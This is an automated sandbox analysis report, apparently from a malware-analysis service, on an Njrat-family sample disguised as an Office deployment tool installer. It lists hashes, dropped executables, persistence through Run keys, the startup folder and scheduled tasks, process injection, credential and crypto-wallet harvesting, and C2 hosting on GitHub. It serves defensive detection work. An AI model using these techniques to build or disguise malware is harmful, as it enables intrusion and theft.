Analysis
-
max time kernel
138s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20250129-en -
resource tags
arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system -
submitted
01-02-2025 17:48
Static task
static1
Behavioral task
behavioral1
Sample
officedeploymenttool_18227-20162.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
officedeploymenttool_18227-20162.exe
Resource
win10v2004-20250129-en
General
-
Target
officedeploymenttool_18227-20162.exe
-
Size
37.5MB
-
MD5
d85711a9d52862c3e538d79217244059
-
SHA1
3ed74e38b09b34db3add5fb2c1f4debb66651987
-
SHA256
b84d06eb8b490a54bdd252a58d25eb54f5580018ecbf3066e0cd5d03ef284c96
-
SHA512
7858369ea6aead310ce6524699301958167914453e7d83849b62088e58c8ef318a75e14da637434340f15e01acbe623337a7d1a06e15ea18c3c32b15d8e843ae
-
SSDEEP
786432:vhP/Hle221VnfaWCXcbWDMzISiBddts4s0ACgz27e6fg8/KQxg6U5SeE+nz2E:vBlVsCFhDMzwds4s0oZ+g8CQxfYX6
Malware Config
Signatures
-
Njrat family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 14 IoCs
description pid Process procid_target PID 5700 created 3540 5700 setup0.exe 56 PID 6088 created 3540 6088 setup1.exe 56 PID 5700 created 3540 5700 setup0.exe 56 PID 6088 created 3540 6088 setup1.exe 56 PID 5700 created 3540 5700 setup0.exe 56 PID 5700 created 3540 5700 setup0.exe 56 PID 6088 created 3540 6088 setup1.exe 56 PID 6088 created 3540 6088 setup1.exe 56 PID 5700 created 3540 5700 setup0.exe 56 PID 6088 created 3540 6088 setup1.exe 56 PID 5700 created 3540 5700 setup0.exe 56 PID 6088 created 3540 6088 setup1.exe 56 PID 5428 created 3540 5428 updater.exe 56 PID 5340 created 3540 5340 update.exe 56 -
pid Process 6776 powershell.exe 7624 powershell.exe 1396 powershell.exe 6196 powershell.exe 5552 powershell.exe 7368 powershell.exe 8088 powershell.exe 8388 powershell.exe 4868 powershell.exe 6752 powershell.exe 7796 powershell.exe -
Contacts a large (841) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 7396 netsh.exe -
Stops running service(s) 4 TTPs
-
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4003209913-3868522715-854928974-1000\Control Panel\International\Geo\Nation officedeploymenttool_18227-20162.exe Key value queried \REGISTRY\USER\S-1-5-21-4003209913-3868522715-854928974-1000\Control Panel\International\Geo\Nation Build.exe Key value queried \REGISTRY\USER\S-1-5-21-4003209913-3868522715-854928974-1000\Control Panel\International\Geo\Nation Runtime Broker.exe Key value queried \REGISTRY\USER\S-1-5-21-4003209913-3868522715-854928974-1000\Control Panel\International\Geo\Nation s.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 816 cmd.exe 5376 powershell.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c6c0c67fa02a1b5dbba63788457d850d.exe GameSDK.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c6c0c67fa02a1b5dbba63788457d850d.exe GameSDK.exe -
Executes dropped EXE 28 IoCs
pid Process 4332 svchost.exe 3196 svchost.exe 264 Build.exe 3556 Stable_Network.exe 3588 Runtime Broker.exe 3952 hacn.exe 4836 based.exe 5036 based.exe 3568 hacn.exe 2244 GameSDK.exe 6192 CL_Debug_Log.txt 7212 rar.exe 8764 GBMkiJyo.exe 3248 GBMkiJyo.exe 2084 s.exe 4448 CompPkgSrv.exe 5080 svchost.exe 4864 crss.exe 4872 setup.exe 5700 setup0.exe 6088 setup1.exe 4344 CompPkgSrv.exe 5736 crss.exe 5796 setup.exe 6332 svchost.exe 7632 Antimalware Service Executable.exe 5340 update.exe 5428 updater.exe -
Loads dropped DLL 64 IoCs
pid Process 3196 svchost.exe 3196 svchost.exe 5036 based.exe 5036 based.exe 5036 based.exe 5036 based.exe 3568 hacn.exe 3568 hacn.exe 3568 hacn.exe 3568 hacn.exe 3568 hacn.exe 3568 hacn.exe 3568 hacn.exe 3568 hacn.exe 3568 hacn.exe 3568 hacn.exe 3568 hacn.exe 3568 hacn.exe 3568 hacn.exe 3568 hacn.exe 3568 hacn.exe 3568 hacn.exe 3568 hacn.exe 3568 hacn.exe 3568 hacn.exe 3568 hacn.exe 3568 hacn.exe 3568 hacn.exe 3568 hacn.exe 3568 hacn.exe 3568 hacn.exe 3568 hacn.exe 3568 hacn.exe 5036 based.exe 5036 based.exe 5036 based.exe 5036 based.exe 5036 based.exe 5036 based.exe 5036 based.exe 5036 based.exe 5036 based.exe 5036 based.exe 5036 based.exe 5036 based.exe 5036 based.exe 3248 GBMkiJyo.exe 3248 GBMkiJyo.exe 3248 GBMkiJyo.exe 4344 CompPkgSrv.exe 4344 CompPkgSrv.exe 5796 setup.exe 5736 crss.exe 5736 crss.exe 5796 setup.exe 5796 setup.exe 5736 crss.exe 5796 setup.exe 5736 crss.exe 5736 crss.exe 5796 setup.exe 5736 crss.exe 4344 CompPkgSrv.exe 5736 crss.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4003209913-3868522715-854928974-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\c6c0c67fa02a1b5dbba63788457d850d = "\"C:\\Users\\Admin\\GameSDK.exe\" .." GameSDK.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\c6c0c67fa02a1b5dbba63788457d850d = "\"C:\\Users\\Admin\\GameSDK.exe\" .." GameSDK.exe Set value (str) \REGISTRY\USER\S-1-5-21-4003209913-3868522715-854928974-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\козляк = "C:\\ProgramData\\crss.exe" crss.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 21 raw.githubusercontent.com 26 raw.githubusercontent.com 20 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 34 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x000400000001dadb-38.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 3 IoCs
pid Process 2036 tasklist.exe 5380 tasklist.exe 1044 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 3568 hacn.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 5700 set thread context of 4404 5700 setup0.exe 248 PID 6088 set thread context of 2248 6088 setup1.exe 251 -
resource yara_rule behavioral2/files/0x000400000001da5e-24.dat upx behavioral2/memory/3196-28-0x00007FFABC160000-0x00007FFABC5C6000-memory.dmp upx behavioral2/memory/3196-33-0x00007FFABC160000-0x00007FFABC5C6000-memory.dmp upx behavioral2/memory/5036-144-0x00007FFABC160000-0x00007FFABC5C6000-memory.dmp upx behavioral2/files/0x000800000001e960-169.dat upx behavioral2/memory/5036-173-0x00007FFAD49C0000-0x00007FFAD49CF000-memory.dmp upx behavioral2/memory/5036-172-0x00007FFACDCF0000-0x00007FFACDD14000-memory.dmp upx behavioral2/files/0x000a00000001e122-167.dat upx behavioral2/memory/5036-1483-0x00007FFAC9F90000-0x00007FFAC9FBC000-memory.dmp upx behavioral2/memory/5036-1484-0x00007FFACC140000-0x00007FFACC158000-memory.dmp upx behavioral2/memory/5036-1485-0x00007FFACB660000-0x00007FFACB67F000-memory.dmp upx behavioral2/memory/5036-1486-0x00007FFABB150000-0x00007FFABB2CA000-memory.dmp upx behavioral2/memory/5036-1487-0x00007FFAC87A0000-0x00007FFAC87B9000-memory.dmp upx behavioral2/memory/5036-1488-0x00007FFACBD70000-0x00007FFACBD7D000-memory.dmp upx behavioral2/memory/5036-1489-0x00007FFABC160000-0x00007FFABC5C6000-memory.dmp upx behavioral2/memory/5036-1490-0x00007FFAC7CD0000-0x00007FFAC7CFE000-memory.dmp upx behavioral2/memory/5036-1494-0x00007FFACDCF0000-0x00007FFACDD14000-memory.dmp upx behavioral2/memory/5036-1493-0x00007FFABA580000-0x00007FFABA638000-memory.dmp upx behavioral2/memory/5036-1491-0x00007FFABA200000-0x00007FFABA579000-memory.dmp upx behavioral2/memory/5036-1495-0x00007FFAC2EA0000-0x00007FFAC2EB5000-memory.dmp upx behavioral2/memory/5036-1496-0x00007FFACB5B0000-0x00007FFACB5BD000-memory.dmp upx behavioral2/memory/5036-1497-0x00007FFAC9F90000-0x00007FFAC9FBC000-memory.dmp upx behavioral2/memory/5036-1498-0x00007FFABB030000-0x00007FFABB148000-memory.dmp upx behavioral2/memory/5036-1541-0x00007FFACC140000-0x00007FFACC158000-memory.dmp upx behavioral2/memory/5036-1609-0x00007FFABB150000-0x00007FFABB2CA000-memory.dmp upx behavioral2/memory/5036-1608-0x00007FFACB660000-0x00007FFACB67F000-memory.dmp upx behavioral2/memory/5036-1688-0x00007FFAC87A0000-0x00007FFAC87B9000-memory.dmp upx behavioral2/memory/5036-1703-0x00007FFAC7CD0000-0x00007FFAC7CFE000-memory.dmp upx behavioral2/memory/5036-1704-0x00007FFABA200000-0x00007FFABA579000-memory.dmp upx behavioral2/memory/5036-1730-0x00007FFABA580000-0x00007FFABA638000-memory.dmp upx behavioral2/memory/5036-1800-0x00007FFAC7CD0000-0x00007FFAC7CFE000-memory.dmp upx behavioral2/memory/5036-1805-0x00007FFABB030000-0x00007FFABB148000-memory.dmp upx behavioral2/memory/5036-1804-0x00007FFACB5B0000-0x00007FFACB5BD000-memory.dmp upx behavioral2/memory/5036-1803-0x00007FFAC2EA0000-0x00007FFAC2EB5000-memory.dmp upx behavioral2/memory/5036-1802-0x00007FFABC160000-0x00007FFABC5C6000-memory.dmp upx behavioral2/memory/5036-1801-0x00007FFABA200000-0x00007FFABA579000-memory.dmp upx behavioral2/memory/5036-1799-0x00007FFABB150000-0x00007FFABB2CA000-memory.dmp upx behavioral2/memory/5036-1798-0x00007FFAC87A0000-0x00007FFAC87B9000-memory.dmp upx behavioral2/memory/5036-1797-0x00007FFACBD70000-0x00007FFACBD7D000-memory.dmp upx behavioral2/memory/5036-1796-0x00007FFACB660000-0x00007FFACB67F000-memory.dmp upx behavioral2/memory/5036-1795-0x00007FFACC140000-0x00007FFACC158000-memory.dmp upx behavioral2/memory/5036-1794-0x00007FFAC9F90000-0x00007FFAC9FBC000-memory.dmp upx behavioral2/memory/5036-1793-0x00007FFAD49C0000-0x00007FFAD49CF000-memory.dmp upx behavioral2/memory/5036-1792-0x00007FFACDCF0000-0x00007FFACDD14000-memory.dmp upx behavioral2/memory/5036-1791-0x00007FFABA580000-0x00007FFABA638000-memory.dmp upx -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files\Google\Chrome\updater.exe setup0.exe File created C:\Program Files\Google\Chrome\update.exe setup1.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1876 sc.exe 3600 sc.exe 4776 sc.exe 9072 sc.exe 1916 sc.exe 8764 sc.exe 9036 sc.exe 1292 sc.exe 9204 sc.exe 2336 sc.exe -
Detects Pyinstaller 2 IoCs
resource yara_rule behavioral2/files/0x000600000001da20-7.dat pyinstaller behavioral2/files/0x000700000001e41e-1909.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 10 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Build.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Runtime Broker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language GameSDK.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language officedeploymenttool_18227-20162.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Stable_Network.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CL_Debug_Log.txt Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language s.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 4616 cmd.exe 5556 netsh.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString svchost.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 CompPkgSrv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString CompPkgSrv.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 7900 WMIC.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS CompPkgSrv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BIOSVersion CompPkgSrv.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BIOSVersion svchost.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 5572 systeminfo.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe -
Modifies registry key 1 TTPs 2 IoCs
pid Process 7060 reg.exe 6784 reg.exe -
NTFS ADS 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Local\Temp\winmgmts:\UKYUHVWM\root\CIMV2 Stable_Network.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 6560 schtasks.exe 3448 schtasks.exe 552 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3556 Stable_Network.exe 3556 Stable_Network.exe 3556 Stable_Network.exe 3556 Stable_Network.exe 3556 Stable_Network.exe 3556 Stable_Network.exe 3556 Stable_Network.exe 3556 Stable_Network.exe 3556 Stable_Network.exe 3556 Stable_Network.exe 3556 Stable_Network.exe 3556 Stable_Network.exe 3556 Stable_Network.exe 3556 Stable_Network.exe 3556 Stable_Network.exe 3556 Stable_Network.exe 3556 Stable_Network.exe 3556 Stable_Network.exe 3556 Stable_Network.exe 3556 Stable_Network.exe 3556 Stable_Network.exe 3556 Stable_Network.exe 3556 Stable_Network.exe 3556 Stable_Network.exe 3556 Stable_Network.exe 3556 Stable_Network.exe 3556 Stable_Network.exe 3556 Stable_Network.exe 3556 Stable_Network.exe 3556 Stable_Network.exe 3556 Stable_Network.exe 3556 Stable_Network.exe 3556 Stable_Network.exe 3556 Stable_Network.exe 3556 Stable_Network.exe 3556 Stable_Network.exe 3556 Stable_Network.exe 3556 Stable_Network.exe 3556 Stable_Network.exe 3556 Stable_Network.exe 3556 Stable_Network.exe 3556 Stable_Network.exe 3556 Stable_Network.exe 3556 Stable_Network.exe 3556 Stable_Network.exe 3556 Stable_Network.exe 3556 Stable_Network.exe 3556 Stable_Network.exe 3556 Stable_Network.exe 3556 Stable_Network.exe 3556 Stable_Network.exe 3556 Stable_Network.exe 3556 Stable_Network.exe 3556 Stable_Network.exe 3556 Stable_Network.exe 3556 Stable_Network.exe 3556 Stable_Network.exe 3556 Stable_Network.exe 3556 Stable_Network.exe 3556 Stable_Network.exe 3556 Stable_Network.exe 3556 Stable_Network.exe 3556 Stable_Network.exe 3556 Stable_Network.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1044 tasklist.exe Token: SeDebugPrivilege 1396 powershell.exe Token: SeDebugPrivilege 2036 tasklist.exe Token: SeDebugPrivilege 4868 powershell.exe Token: SeIncreaseQuotaPrivilege 5388 WMIC.exe Token: SeSecurityPrivilege 5388 WMIC.exe Token: SeTakeOwnershipPrivilege 5388 WMIC.exe Token: SeLoadDriverPrivilege 5388 WMIC.exe Token: SeSystemProfilePrivilege 5388 WMIC.exe Token: SeSystemtimePrivilege 5388 WMIC.exe Token: SeProfSingleProcessPrivilege 5388 WMIC.exe Token: SeIncBasePriorityPrivilege 5388 WMIC.exe Token: SeCreatePagefilePrivilege 5388 WMIC.exe Token: SeBackupPrivilege 5388 WMIC.exe Token: SeRestorePrivilege 5388 WMIC.exe Token: SeShutdownPrivilege 5388 WMIC.exe Token: SeDebugPrivilege 5388 WMIC.exe Token: SeSystemEnvironmentPrivilege 5388 WMIC.exe Token: SeRemoteShutdownPrivilege 5388 WMIC.exe Token: SeUndockPrivilege 5388 WMIC.exe Token: SeManageVolumePrivilege 5388 WMIC.exe Token: 33 5388 WMIC.exe Token: 34 5388 WMIC.exe Token: 35 5388 WMIC.exe Token: 36 5388 WMIC.exe Token: SeDebugPrivilege 5380 tasklist.exe Token: SeDebugPrivilege 5376 powershell.exe Token: SeDebugPrivilege 5544 powershell.exe Token: SeIncreaseQuotaPrivilege 5388 WMIC.exe Token: SeSecurityPrivilege 5388 WMIC.exe Token: SeTakeOwnershipPrivilege 5388 WMIC.exe Token: SeLoadDriverPrivilege 5388 WMIC.exe Token: SeSystemProfilePrivilege 5388 WMIC.exe Token: SeSystemtimePrivilege 5388 WMIC.exe Token: SeProfSingleProcessPrivilege 5388 WMIC.exe Token: SeIncBasePriorityPrivilege 5388 WMIC.exe Token: SeCreatePagefilePrivilege 5388 WMIC.exe Token: SeBackupPrivilege 5388 WMIC.exe Token: SeRestorePrivilege 5388 WMIC.exe Token: SeShutdownPrivilege 5388 WMIC.exe Token: SeDebugPrivilege 5388 WMIC.exe Token: SeSystemEnvironmentPrivilege 5388 WMIC.exe Token: SeRemoteShutdownPrivilege 5388 WMIC.exe Token: SeUndockPrivilege 5388 WMIC.exe Token: SeManageVolumePrivilege 5388 WMIC.exe Token: 33 5388 WMIC.exe Token: 34 5388 WMIC.exe Token: 35 5388 WMIC.exe Token: 36 5388 WMIC.exe Token: SeRestorePrivilege 6192 CL_Debug_Log.txt Token: 35 6192 CL_Debug_Log.txt Token: SeSecurityPrivilege 6192 CL_Debug_Log.txt Token: SeSecurityPrivilege 6192 CL_Debug_Log.txt Token: SeDebugPrivilege 6776 powershell.exe Token: SeDebugPrivilege 6960 powershell.exe Token: SeIncreaseQuotaPrivilege 7500 WMIC.exe Token: SeSecurityPrivilege 7500 WMIC.exe Token: SeTakeOwnershipPrivilege 7500 WMIC.exe Token: SeLoadDriverPrivilege 7500 WMIC.exe Token: SeSystemProfilePrivilege 7500 WMIC.exe Token: SeSystemtimePrivilege 7500 WMIC.exe Token: SeProfSingleProcessPrivilege 7500 WMIC.exe Token: SeIncBasePriorityPrivilege 7500 WMIC.exe Token: SeCreatePagefilePrivilege 7500 WMIC.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 3556 Stable_Network.exe 3556 Stable_Network.exe 3556 Stable_Network.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 3556 Stable_Network.exe 3556 Stable_Network.exe 3556 Stable_Network.exe -
Suspicious use of UnmapMainImage 1 IoCs
pid Process 4008 RuntimeBroker.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2944 wrote to memory of 4332 2944 officedeploymenttool_18227-20162.exe 86 PID 2944 wrote to memory of 4332 2944 officedeploymenttool_18227-20162.exe 86 PID 4332 wrote to memory of 3196 4332 svchost.exe 87 PID 4332 wrote to memory of 3196 4332 svchost.exe 87 PID 3196 wrote to memory of 264 3196 svchost.exe 88 PID 3196 wrote to memory of 264 3196 svchost.exe 88 PID 3196 wrote to memory of 264 3196 svchost.exe 88 PID 2944 wrote to memory of 3556 2944 officedeploymenttool_18227-20162.exe 89 PID 2944 wrote to memory of 3556 2944 officedeploymenttool_18227-20162.exe 89 PID 2944 wrote to memory of 3556 2944 officedeploymenttool_18227-20162.exe 89 PID 2944 wrote to memory of 3588 2944 officedeploymenttool_18227-20162.exe 90 PID 2944 wrote to memory of 3588 2944 officedeploymenttool_18227-20162.exe 90 PID 2944 wrote to memory of 3588 2944 officedeploymenttool_18227-20162.exe 90 PID 264 wrote to memory of 3952 264 Build.exe 91 PID 264 wrote to memory of 3952 264 Build.exe 91 PID 264 wrote to memory of 4836 264 Build.exe 93 PID 264 wrote to memory of 4836 264 Build.exe 93 PID 4836 wrote to memory of 5036 4836 based.exe 94 PID 4836 wrote to memory of 5036 4836 based.exe 94 PID 3952 wrote to memory of 3568 3952 hacn.exe 95 PID 3952 wrote to memory of 3568 3952 hacn.exe 95 PID 3568 wrote to memory of 1248 